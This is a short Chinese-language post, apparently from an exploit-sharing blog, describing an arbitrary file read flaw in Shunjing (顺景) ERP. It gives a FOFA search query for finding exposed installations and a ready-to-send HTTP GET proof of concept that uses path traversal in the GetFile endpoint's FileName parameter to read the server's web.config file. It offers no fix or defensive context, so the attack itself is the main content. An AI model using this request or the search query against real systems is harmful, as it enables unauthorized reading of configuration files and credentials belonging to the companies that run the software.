漏洞挖掘---顺景ERP-GetFile任意文件读取漏洞

        一、顺景ERP

        顺景 ERP 是广东顺景软件科技有限公司研发的企业资源规划系统。它以制造为核心，融合供应链、财务等管理，打破部门壁垒，实现全程无缝管理。该系统功能丰富，支持多语言、多平台，具备柔性流程、条码应用等特色功能，助力企业规范流程、提升效率 。

        二、FOFA-Search...

body="/api/DBRecord/getDBRecords"

        三、POC

GET /api/Download/GetFile?FileName=../web.config&Title=123 HTTP/1.1
Host: ......
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=4

                                                                                                                                     FROM  IYU_